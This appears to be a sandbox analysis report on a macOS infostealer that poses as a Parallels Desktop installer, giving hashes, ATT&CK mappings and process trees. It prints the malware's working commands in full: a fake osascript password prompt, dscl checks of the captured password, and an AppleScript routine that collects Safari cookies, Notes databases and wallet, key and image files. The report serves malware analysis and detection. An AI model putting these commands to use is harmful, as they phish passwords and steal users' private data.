73158e935a663dba448586790af86a2902d82ab9fa4d7cbaf1acdab3fcad6168

General

Target

Install-Parallels-Desktop/Install-Parallels-Desktop
Size

584KB
MD5

27e996aae5ab17a1ce7dc4ba76c8a28c
SHA1

85d38842deba55c004b68fe98e6a892f81d08886
SHA256

83fef9c841dbe73255742464fa6dcb23602dcd35554c4b66a82ee7711543bbc5
SHA512

7e99f4cc734912560a1174f99ec2df7318f6a2ab9488503221ca7b0514be2fc4b7e7338a42b514e7d5162f5ef398bf1be6c1a3eaf7f2532fb17a76e1f948a942
SSDEEP

12288:Wjj47eV5Az3lt64hqk5rDdIba7tpv5ViofaR5iJpVP4wwoo:gj4CgzLqk5PdIba7tpv5ViofaR5iJpVX

Score

8^/10

Malware Config

Signatures

Identifies hardware specifics through system_profiler 2 IoCs

ioc	Process
sh -c "system_profiler SPSoftwareDataType SPHardwareDataType SPDisplaysDataType"	Process not Found
system_profiler SPSoftwareDataType SPHardwareDataType SPDisplaysDataType	Process not Found

AppleScript 1 TTPs 12 IoCs

execution

AppleScript

T1059.002

ioc	Process
osascript -e "display dialog \"Required Application Helper. Please enter passphrase for root.\" default answer \"\" with icon caution buttons {\"Continue\"} default button \"Continue\" giving up after 150 with title \"Application wants to install helper\" with hidden answer"	Process not Found
osascript -e "tell application \"Terminal\" to close first window"	Process not Found
sh -c "osascript -e 'display dialog \"Required Application Helper. Please enter passphrase for run.\" default answer \"\" with icon caution buttons {\"Continue\"} default button \"Continue\" giving up after 150 with title \"Application wants to install helper\" with hidden answer'"	Process not Found
osascript -e "set destinationFolderPath to (path to home folder as text) & \"fg:\" set extensionsList to {\"txt\",\"png\",\"jpg\",\"jpeg\",\"wallet\",\"keys\",\"key\"} set bankSize to 0 tell application \"Finder\" set username to short user name of (system info) try if not (exists folder destinationFolderPath) then make new folder at (path to home folder) with properties {name:\"fg\"} end if set safariFolder to ((path to library folder from user domain as text) & \"Containers:com.apple.Safari:Data:Library:Cookies:\") try duplicate file \"Cookies.binarycookies\" of folder safariFolder to folder destinationFolderPath with replacing end try set notesFolderPath to (path to home folder as text) & \"Library:Group Containers:group.com.apple.notes:\" try set notesFolder to folder notesFolderPath set notesFiles to {file \"NoteStore.sqlite\", file \"NoteStore.sqlite-shm\", file \"NoteStore.sqlite-wal\"} of notesFolder repeat with aFile in notesFiles set fileSize to size of aFile if (bankSize + fileSize) ≤ 10 * 1024 * 1024 then try duplicate aFile to folder destinationFolderPath with replacing set bankSize to bankSize + fileSize end try else exit repeat end if end repeat end try set desktopFiles to every file of desktop set documentsFiles to every file of folder \"Documents\" of (path to home folder) repeat with aFile in (desktopFiles & documentsFiles) set fileExtension to name extension of aFile if fileExtension is in extensionsList then set fileSize to size of aFile if (bankSize + fileSize) ≤ 10 * 1024 * 1024 then try duplicate aFile to folder destinationFolderPath with replacing set bankSize to bankSize + fileSize end try else exit repeat end if end if end repeat end try end tell"	Process not Found
sh -c "osascript -e 'display dialog \"Required Application Helper. Please enter passphrase for root.\" default answer \"\" with icon caution buttons {\"Continue\"} default button \"Continue\" giving up after 150 with title \"Application wants to install helper\" with hidden answer'"	Process not Found
sh -c "osascript -e 'tell application \"Terminal\" to close first window' & exit"	Process not Found
sh -c "osascript -e 'display dialog \"Required Application Helper. Please enter passphrase for root.\" default answer \"\" with icon caution buttons {\"Continue\"} default button \"Continue\" giving up after 150 with title \"Application wants to install helper\" with hidden answer'"	Process not Found
sh -c "osascript -e 'tell application \"Terminal\" to close first window' & exit"	Process not Found
osascript -e "display dialog \"Required Application Helper. Please enter passphrase for run.\" default answer \"\" with icon caution buttons {\"Continue\"} default button \"Continue\" giving up after 150 with title \"Application wants to install helper\" with hidden answer"	Process not Found
sh -c "osascript -e 'set destinationFolderPath to (path to home folder as text) & \"fg:\" set extensionsList to {\"txt\",\"png\",\"jpg\",\"jpeg\",\"wallet\",\"keys\",\"key\"} set bankSize to 0 tell application \"Finder\" set username to short user name of (system info) try if not (exists folder destinationFolderPath) then make new folder at (path to home folder) with properties {name:\"fg\"} end if set safariFolder to ((path to library folder from user domain as text) & \"Containers:com.apple.Safari:Data:Library:Cookies:\") try duplicate file \"Cookies.binarycookies\" of folder safariFolder to folder destinationFolderPath with replacing end try set notesFolderPath to (path to home folder as text) & \"Library:Group Containers:group.com.apple.notes:\" try set notesFolder to folder notesFolderPath set notesFiles to {file \"NoteStore.sqlite\", file \"NoteStore.sqlite-shm\", file \"NoteStore.sqlite-wal\"} of notesFolder repeat with aFile in notesFiles set fileSize to size of aFile if (bankSize + fileSize) ≤ 10 * 1024 * 1024 then try duplicate aFile to folder destinationFolderPath with replacing set bankSize to bankSize + fileSize end try else exit repeat end if end repeat end try set desktopFiles to every file of desktop set documentsFiles to every file of folder \"Documents\" of (path to home folder) repeat with aFile in (desktopFiles & documentsFiles) set fileExtension to name extension of aFile if fileExtension is in extensionsList then set fileSize to size of aFile if (bankSize + fileSize) ≤ 10 * 1024 * 1024 then try duplicate aFile to folder destinationFolderPath with replacing set bankSize to bankSize + fileSize end try else exit repeat end if end if end repeat end try end tell'"	Process not Found
osascript -e "display dialog \"Required Application Helper. Please enter passphrase for root.\" default answer \"\" with icon caution buttons {\"Continue\"} default button \"Continue\" giving up after 150 with title \"Application wants to install helper\" with hidden answer"	Process not Found
osascript -e "tell application \"Terminal\" to close first window"	Process not Found

Resource Forking 1 TTPs 4 IoCs

evasion

Resource Forking

T1564.009

ioc	Process
/System/Library/PrivateFrameworks/DesktopServicesPriv.framework/Resources/DesktopServicesHelper	Process not Found
/System/Library/PrivateFrameworks/DesktopServicesPriv.framework/Resources/DesktopServicesHelper	Process not Found
/System/Library/PrivateFrameworks/DesktopServicesPriv.framework/Resources/DesktopServicesHelper	Process not Found
/System/Library/Frameworks/Quartz.framework/Frameworks/QuickLookUI.framework/Resources/QuickLookUIHelper.app/Contents/MacOS/QuickLookUIHelper	Process not Found

/bin/sh
sh -c "sudo /bin/zsh -c \"/Users/run/Install-Parallels-Desktop/Install-Parallels-Desktop\""
1⤵
PID:558

/bin/bash
sh -c "sudo /bin/zsh -c \"/Users/run/Install-Parallels-Desktop/Install-Parallels-Desktop\""
1⤵
PID:558

/usr/bin/sudo
sudo /bin/zsh -c /Users/run/Install-Parallels-Desktop/Install-Parallels-Desktop
1⤵
PID:558
- /bin/zsh
  /bin/zsh -c /Users/run/Install-Parallels-Desktop/Install-Parallels-Desktop
  2⤵
  PID:559
- /Users/run/Install-Parallels-Desktop/Install-Parallels-Desktop
  /Users/run/Install-Parallels-Desktop/Install-Parallels-Desktop
  2⤵
  PID:559

/bin/sh
sh -c "osascript -e 'tell application \"Terminal\" to close first window' & exit"
1⤵
PID:561

/bin/bash
sh -c "osascript -e 'tell application \"Terminal\" to close first window' & exit"
1⤵
PID:561
- /usr/bin/osascript
  osascript -e "tell application \"Terminal\" to close first window"
  2⤵
  PID:562

/bin/sh
sh -c "dscl . authonly \"root\" \"\""
1⤵
PID:563

/bin/bash
sh -c "dscl . authonly \"root\" \"\""
1⤵
PID:563

/usr/bin/dscl
dscl . authonly root
1⤵
PID:563

/bin/sh
sh -c "osascript -e 'display dialog \"Required Application Helper. Please enter passphrase for root.\" default answer \"\" with icon caution buttons {\"Continue\"} default button \"Continue\" giving up after 150 with title \"Application wants to install helper\" with hidden answer'"
1⤵
PID:564

/bin/bash
sh -c "osascript -e 'display dialog \"Required Application Helper. Please enter passphrase for root.\" default answer \"\" with icon caution buttons {\"Continue\"} default button \"Continue\" giving up after 150 with title \"Application wants to install helper\" with hidden answer'"
1⤵
PID:564

/usr/bin/osascript
osascript -e "display dialog \"Required Application Helper. Please enter passphrase for root.\" default answer \"\" with icon caution buttons {\"Continue\"} default button \"Continue\" giving up after 150 with title \"Application wants to install helper\" with hidden answer"
1⤵
PID:564

/usr/sbin/kextcache
/usr/sbin/kextcache -F -system-prelinked-kernel
1⤵
PID:569

/usr/libexec/dmd
/usr/libexec/dmd
1⤵
PID:553

/usr/libexec/xpcproxy
xpcproxy com.apple.secinitd
1⤵
PID:572

/usr/libexec/secinitd
/usr/libexec/secinitd
1⤵
PID:572

/usr/libexec/xpcproxy
xpcproxy com.apple.sysmond
1⤵
PID:573

/usr/libexec/sysmond
/usr/libexec/sysmond
1⤵
PID:573

/usr/libexec/xpcproxy
xpcproxy com.apple.audio.systemsoundserverd
1⤵
PID:588

/usr/sbin/systemsoundserverd
/usr/sbin/systemsoundserverd
1⤵
PID:588

/usr/libexec/xpcproxy
xpcproxy com.apple.audio.AudioComponentRegistrar
1⤵
PID:591

/System/Library/Frameworks/AudioToolbox.framework/AudioComponentRegistrar
/System/Library/Frameworks/AudioToolbox.framework/AudioComponentRegistrar -daemon
1⤵
PID:591

/usr/libexec/xpcproxy
xpcproxy com.apple.sandboxd
1⤵
PID:596

/usr/libexec/sandboxd
/usr/libexec/sandboxd
1⤵
PID:596

/usr/libexec/xpcproxy
xpcproxy com.apple.TextInputMenuAgent
1⤵
PID:597

/System/Library/CoreServices/TextInputMenuAgent.app/Contents/MacOS/TextInputMenuAgent
/System/Library/CoreServices/TextInputMenuAgent.app/Contents/MacOS/TextInputMenuAgent
1⤵
PID:597

/usr/libexec/xpcproxy
xpcproxy com.apple.bird
1⤵
PID:598

/System/Library/PrivateFrameworks/CloudDocsDaemon.framework/Versions/A/Support/bird
/System/Library/PrivateFrameworks/CloudDocsDaemon.framework/Versions/A/Support/bird
1⤵
PID:598

/usr/libexec/xpcproxy
xpcproxy com.apple.TextInputSwitcher
1⤵
PID:599

/System/Library/CoreServices/TextInputSwitcher.app/Contents/MacOS/TextInputSwitcher
/System/Library/CoreServices/TextInputSwitcher.app/Contents/MacOS/TextInputSwitcher
1⤵
PID:599

/usr/libexec/xpcproxy
xpcproxy com.apple.icloud.findmydeviced
1⤵
PID:601

/usr/libexec/findmydeviced
/usr/libexec/findmydeviced
1⤵
PID:601

/usr/bin/login
login -pf run
1⤵
PID:602
- /bin/zsh
  -zsh
  2⤵
  PID:604
- - /usr/libexec/path_helper
    /usr/libexec/path_helper -s
    3⤵
    PID:605
- - /usr/bin/locale
    locale LC_CTYPE
    3⤵
    PID:606
- - /bin/ls
    ls
    3⤵
    PID:608
- - /usr/bin/open
    open Install-Parallels-Desktop
    3⤵
    PID:636

/usr/libexec/xpcproxy
xpcproxy com.apple.AccountPolicyHelper
1⤵
PID:603

/System/Library/PrivateFrameworks/AccountPolicy.framework/XPCServices/com.apple.AccountPolicyHelper.xpc/Contents/MacOS/com.apple.AccountPolicyHelper
/System/Library/PrivateFrameworks/AccountPolicy.framework/XPCServices/com.apple.AccountPolicyHelper.xpc/Contents/MacOS/com.apple.AccountPolicyHelper
1⤵
PID:603

/usr/libexec/xpcproxy
xpcproxy com.apple.geod
1⤵
PID:619

/System/Library/PrivateFrameworks/GeoServices.framework/Versions/A/XPCServices/com.apple.geod.xpc/Contents/MacOS/com.apple.geod
/System/Library/PrivateFrameworks/GeoServices.framework/Versions/A/XPCServices/com.apple.geod.xpc/Contents/MacOS/com.apple.geod
1⤵
PID:619

/usr/libexec/xpcproxy
xpcproxy com.apple.geod
1⤵
PID:620

/System/Library/PrivateFrameworks/GeoServices.framework/Versions/A/XPCServices/com.apple.geod.xpc/Contents/MacOS/com.apple.geod
/System/Library/PrivateFrameworks/GeoServices.framework/Versions/A/XPCServices/com.apple.geod.xpc/Contents/MacOS/com.apple.geod
1⤵
PID:620

/usr/libexec/xpcproxy
xpcproxy com.apple.secinitd
1⤵
PID:621

/usr/libexec/secinitd
/usr/libexec/secinitd
1⤵
PID:621

/usr/libexec/xpcproxy
xpcproxy com.apple.cfprefsd.xpc.agent
1⤵
PID:622

/usr/sbin/cfprefsd
/usr/sbin/cfprefsd agent
1⤵
PID:622

/usr/libexec/xpcproxy
xpcproxy com.apple.neagent.878568F8-CCE5-4157-8315-22F20DC8FB0A
1⤵
PID:625

/usr/libexec/neagent
/usr/libexec/neagent
1⤵
PID:625

/usr/libexec/xpcproxy
xpcproxy com.apple.PerformanceAnalysis.animationperfd
1⤵
PID:629

/System/Library/PrivateFrameworks/PerformanceAnalysis.framework/Versions/A/XPCServices/com.apple.PerformanceAnalysis.animationperfd.xpc/Contents/MacOS/com.apple.PerformanceAnalysis.animationperfd
/System/Library/PrivateFrameworks/PerformanceAnalysis.framework/Versions/A/XPCServices/com.apple.PerformanceAnalysis.animationperfd.xpc/Contents/MacOS/com.apple.PerformanceAnalysis.animationperfd
1⤵
PID:629

/usr/libexec/xpcproxy
xpcproxy com.apple.corespotlightservice.725FD30A-6064-6C02-CC51-5DDB8891B57E
1⤵
PID:640

/System/Library/Frameworks/CoreSpotlight.framework/CoreSpotlightService
/System/Library/Frameworks/CoreSpotlight.framework/CoreSpotlightService
1⤵
PID:640

/usr/libexec/xpcproxy
xpcproxy com.apple.quicklook.ui.helper
1⤵
PID:641

/System/Library/Frameworks/Quartz.framework/Frameworks/QuickLookUI.framework/Resources/QuickLookUIHelper.app/Contents/MacOS/QuickLookUIHelper
/System/Library/Frameworks/Quartz.framework/Frameworks/QuickLookUI.framework/Resources/QuickLookUIHelper.app/Contents/MacOS/QuickLookUIHelper
1⤵
PID:641

/usr/libexec/xpcproxy
xpcproxy com.apple.metadata.mdwrite
1⤵
PID:642

/usr/bin/login
login -pf run
1⤵
PID:643
- /bin/zsh
  -zsh
  2⤵
  PID:644
- - /usr/libexec/path_helper
    /usr/libexec/path_helper -s
    3⤵
    PID:645
- - /usr/bin/locale
    locale LC_CTYPE
    3⤵
    PID:646
- - /Users/run/Install-Parallels-Desktop/Install-Parallels-Desktop
    /Users/run/Install-Parallels-Desktop/Install-Parallels-Desktop
    3⤵
    PID:647

/bin/sh
sh -c "osascript -e 'tell application \"Terminal\" to close first window' & exit"
1⤵
PID:649

/bin/bash
sh -c "osascript -e 'tell application \"Terminal\" to close first window' & exit"
1⤵
PID:649
- /usr/bin/osascript
  osascript -e "tell application \"Terminal\" to close first window"
  2⤵
  PID:650

/bin/sh
sh -c "dscl . authonly \"run\" \"\""
1⤵
PID:651

/bin/bash
sh -c "dscl . authonly \"run\" \"\""
1⤵
PID:651

/usr/bin/dscl
dscl . authonly run
1⤵
PID:651

/bin/sh
sh -c "osascript -e 'display dialog \"Required Application Helper. Please enter passphrase for run.\" default answer \"\" with icon caution buttons {\"Continue\"} default button \"Continue\" giving up after 150 with title \"Application wants to install helper\" with hidden answer'"
1⤵
PID:652

/bin/bash
sh -c "osascript -e 'display dialog \"Required Application Helper. Please enter passphrase for run.\" default answer \"\" with icon caution buttons {\"Continue\"} default button \"Continue\" giving up after 150 with title \"Application wants to install helper\" with hidden answer'"
1⤵
PID:652

/usr/bin/osascript
osascript -e "display dialog \"Required Application Helper. Please enter passphrase for run.\" default answer \"\" with icon caution buttons {\"Continue\"} default button \"Continue\" giving up after 150 with title \"Application wants to install helper\" with hidden answer"
1⤵
PID:652

/usr/libexec/xpcproxy
xpcproxy com.apple.ReportMemoryException
1⤵
PID:653

/usr/libexec/ReportMemoryException
/usr/libexec/ReportMemoryException
1⤵
PID:653

/bin/sh
sh -c "dscl . authonly \"run\" \"root\""
1⤵
PID:654

/bin/bash
sh -c "dscl . authonly \"run\" \"root\""
1⤵
PID:654

/usr/bin/dscl
dscl . authonly run root
1⤵
PID:654

/bin/sh
sh -c "osascript -e 'set destinationFolderPath to (path to home folder as text) & \"fg:\" set extensionsList to {\"txt\",\"png\",\"jpg\",\"jpeg\",\"wallet\",\"keys\",\"key\"} set bankSize to 0 tell application \"Finder\" set username to short user name of (system info) try if not (exists folder destinationFolderPath) then make new folder at (path to home folder) with properties {name:\"fg\"} end if set safariFolder to ((path to library folder from user domain as text) & \"Containers:com.apple.Safari:Data:Library:Cookies:\") try duplicate file \"Cookies.binarycookies\" of folder safariFolder to folder destinationFolderPath with replacing end try set notesFolderPath to (path to home folder as text) & \"Library:Group Containers:group.com.apple.notes:\" try set notesFolder to folder notesFolderPath set notesFiles to {file \"NoteStore.sqlite\", file \"NoteStore.sqlite-shm\", file \"NoteStore.sqlite-wal\"} of notesFolder repeat with aFile in notesFiles set fileSize to size of aFile if (bankSize + fileSize) ≤ 10 * 1024 * 1024 then try duplicate aFile to folder destinationFolderPath with replacing set bankSize to bankSize + fileSize end try else exit repeat end if end repeat end try set desktopFiles to every file of desktop set documentsFiles to every file of folder \"Documents\" of (path to home folder) repeat with aFile in (desktopFiles & documentsFiles) set fileExtension to name extension of aFile if fileExtension is in extensionsList then set fileSize to size of aFile if (bankSize + fileSize) ≤ 10 * 1024 * 1024 then try duplicate aFile to folder destinationFolderPath with replacing set bankSize to bankSize + fileSize end try else exit repeat end if end if end repeat end try end tell'"
1⤵
PID:655

/bin/bash
sh -c "osascript -e 'set destinationFolderPath to (path to home folder as text) & \"fg:\" set extensionsList to {\"txt\",\"png\",\"jpg\",\"jpeg\",\"wallet\",\"keys\",\"key\"} set bankSize to 0 tell application \"Finder\" set username to short user name of (system info) try if not (exists folder destinationFolderPath) then make new folder at (path to home folder) with properties {name:\"fg\"} end if set safariFolder to ((path to library folder from user domain as text) & \"Containers:com.apple.Safari:Data:Library:Cookies:\") try duplicate file \"Cookies.binarycookies\" of folder safariFolder to folder destinationFolderPath with replacing end try set notesFolderPath to (path to home folder as text) & \"Library:Group Containers:group.com.apple.notes:\" try set notesFolder to folder notesFolderPath set notesFiles to {file \"NoteStore.sqlite\", file \"NoteStore.sqlite-shm\", file \"NoteStore.sqlite-wal\"} of notesFolder repeat with aFile in notesFiles set fileSize to size of aFile if (bankSize + fileSize) ≤ 10 * 1024 * 1024 then try duplicate aFile to folder destinationFolderPath with replacing set bankSize to bankSize + fileSize end try else exit repeat end if end repeat end try set desktopFiles to every file of desktop set documentsFiles to every file of folder \"Documents\" of (path to home folder) repeat with aFile in (desktopFiles & documentsFiles) set fileExtension to name extension of aFile if fileExtension is in extensionsList then set fileSize to size of aFile if (bankSize + fileSize) ≤ 10 * 1024 * 1024 then try duplicate aFile to folder destinationFolderPath with replacing set bankSize to bankSize + fileSize end try else exit repeat end if end if end repeat end try end tell'"
1⤵
PID:655

/usr/bin/osascript
osascript -e "set destinationFolderPath to (path to home folder as text) & \"fg:\" set extensionsList to {\"txt\",\"png\",\"jpg\",\"jpeg\",\"wallet\",\"keys\",\"key\"} set bankSize to 0 tell application \"Finder\" set username to short user name of (system info) try if not (exists folder destinationFolderPath) then make new folder at (path to home folder) with properties {name:\"fg\"} end if set safariFolder to ((path to library folder from user domain as text) & \"Containers:com.apple.Safari:Data:Library:Cookies:\") try duplicate file \"Cookies.binarycookies\" of folder safariFolder to folder destinationFolderPath with replacing end try set notesFolderPath to (path to home folder as text) & \"Library:Group Containers:group.com.apple.notes:\" try set notesFolder to folder notesFolderPath set notesFiles to {file \"NoteStore.sqlite\", file \"NoteStore.sqlite-shm\", file \"NoteStore.sqlite-wal\"} of notesFolder repeat with aFile in notesFiles set fileSize to size of aFile if (bankSize + fileSize) ≤ 10 * 1024 * 1024 then try duplicate aFile to folder destinationFolderPath with replacing set bankSize to bankSize + fileSize end try else exit repeat end if end repeat end try set desktopFiles to every file of desktop set documentsFiles to every file of folder \"Documents\" of (path to home folder) repeat with aFile in (desktopFiles & documentsFiles) set fileExtension to name extension of aFile if fileExtension is in extensionsList then set fileSize to size of aFile if (bankSize + fileSize) ≤ 10 * 1024 * 1024 then try duplicate aFile to folder destinationFolderPath with replacing set bankSize to bankSize + fileSize end try else exit repeat end if end if end repeat end try end tell"
1⤵
PID:655

/usr/libexec/xpcproxy
xpcproxy com.apple.DesktopServicesHelper.980CF220-74B2-472F-95C8-DF9CFD10F03A
1⤵
PID:658

/System/Library/PrivateFrameworks/DesktopServicesPriv.framework/Resources/DesktopServicesHelper
/System/Library/PrivateFrameworks/DesktopServicesPriv.framework/Resources/DesktopServicesHelper
1⤵
PID:658

/usr/libexec/xpcproxy
xpcproxy com.apple.DesktopServicesHelper.B377123F-19D1-4234-A7D8-BFB13CC1FD05
1⤵
PID:659

/System/Library/PrivateFrameworks/DesktopServicesPriv.framework/Resources/DesktopServicesHelper
/System/Library/PrivateFrameworks/DesktopServicesPriv.framework/Resources/DesktopServicesHelper
1⤵
PID:659

/usr/libexec/xpcproxy
xpcproxy com.apple.DesktopServicesHelper.A7F0CBE5-5F5E-4A07-85C1-B2A6E4FBB2D2
1⤵
PID:660

/System/Library/PrivateFrameworks/DesktopServicesPriv.framework/Resources/DesktopServicesHelper
/System/Library/PrivateFrameworks/DesktopServicesPriv.framework/Resources/DesktopServicesHelper
1⤵
PID:660

/bin/sh
sh -c "system_profiler SPSoftwareDataType SPHardwareDataType SPDisplaysDataType"
1⤵
PID:661

/bin/bash
sh -c "system_profiler SPSoftwareDataType SPHardwareDataType SPDisplaysDataType"
1⤵
PID:661

/usr/sbin/system_profiler
system_profiler SPSoftwareDataType SPHardwareDataType SPDisplaysDataType
1⤵
PID:661

/usr/bin/csrutil
/usr/bin/csrutil status
1⤵
PID:663

/usr/libexec/xpcproxy
xpcproxy com.apple.tailspind
1⤵
PID:672

/usr/libexec/tailspind
/usr/libexec/tailspind
1⤵
PID:672

/bin/sh
sh -c "dscl . authonly \"root\" \"p:true \""
1⤵
PID:674

/bin/bash
sh -c "dscl . authonly \"root\" \"p:true \""
1⤵
PID:674

/usr/bin/dscl
dscl . authonly root "p:true "
1⤵
PID:674

/bin/sh
sh -c "osascript -e 'display dialog \"Required Application Helper. Please enter passphrase for root.\" default answer \"\" with icon caution buttons {\"Continue\"} default button \"Continue\" giving up after 150 with title \"Application wants to install helper\" with hidden answer'"
1⤵
PID:675

/bin/bash
sh -c "osascript -e 'display dialog \"Required Application Helper. Please enter passphrase for root.\" default answer \"\" with icon caution buttons {\"Continue\"} default button \"Continue\" giving up after 150 with title \"Application wants to install helper\" with hidden answer'"
1⤵
PID:675

/usr/bin/osascript
osascript -e "display dialog \"Required Application Helper. Please enter passphrase for root.\" default answer \"\" with icon caution buttons {\"Continue\"} default button \"Continue\" giving up after 150 with title \"Application wants to install helper\" with hidden answer"
1⤵
PID:675

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

AppleScript

1

T1059.002

Persistence

Privilege Escalation

Defense Evasion

Hide Artifacts

1

T1564

Resource Forking

1

T1564.009

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/Users/run/Library/Caches/GeoServices/Resources/altitude-1168.xml

Filesize
150KB

MD5
76ebb0196d42a294b69ef118cbb301d5

SHA1
61e5ab752d351af1661716bc48c0520f66cd1d1b

SHA256
aaa9febe98e3a75220b4933d1f00f2bef276183491e7d171fa54d03259812759

SHA512
8dde09d72944e8925c5bd64dc3799a44d7c30191d5038939a24f8a45ccf4d66b84990e8be3e0f2ee1d42d1dd6e5ed3673c39f803874fb0840a3232cc1e533663

Download Submit
/var/folders/pq/yy2b5ptn4cz739jgclj4m1wm0000gp/C//mds/mdsDirectory.db

Filesize
47KB

MD5
0e4a0d1ceb2af6f0f8d0167ce77be2d3

SHA1
414ba4c1dc5fc8bf53d550e296fd6f5ad669918c

SHA256
cca093bcfc65e25dd77c849866e110df72526dffbe29d76e11e29c7d888a4030

SHA512
1dc5282d27c49a4b6f921ba5dfc88b8c1d32289df00dd866f9ac6669a5a8d99afeda614bffc7cf61a44375ae73e09cd52606b443b63636977c9cd2ef4fa68a20

Download Submit
/var/folders/pq/yy2b5ptn4cz739jgclj4m1wm0000gp/C//mds/mdsObject.db

Filesize
4KB

MD5
d3a1859e6ec593505cc882e6def48fc8

SHA1
f8e6728e3e9de477a75706faa95cead9ce13cb32

SHA256
3ebafa97782204a4a1d75cfec22e15fcdeab45b65bab3b3e65508707e034a16c

SHA512
ea2a749b105759ea33408186b417359deffb4a3a5ed0533cb26b459c16bb3524d67ede5c9cf0d5098921c0c0a9313fb9c2672f1e5ba48810eda548fa3209e818

Download Submit
/var/root/Library/Saved Application State/com.apple.osascript.savedState/data.data

Filesize
2KB

MD5
086f917f3d1a80cc801d4515fd19ed5c

SHA1
5825265b0386cb7dcf05d5a84470c814057aa6cb

SHA256
c0adc16bcb9ad7b2fc886f145a5c860b1f7017fd9eae4248936b2c36ae1b9a93

SHA512
78b0c1b17d8712cd414d61f455f2e15325c149abb761788929d217ad40364587e6b0f8420620b2ce92ca9e6703d775c7e1110873905a48693f300556d413dc66

Download Submit

Analysis

Sharing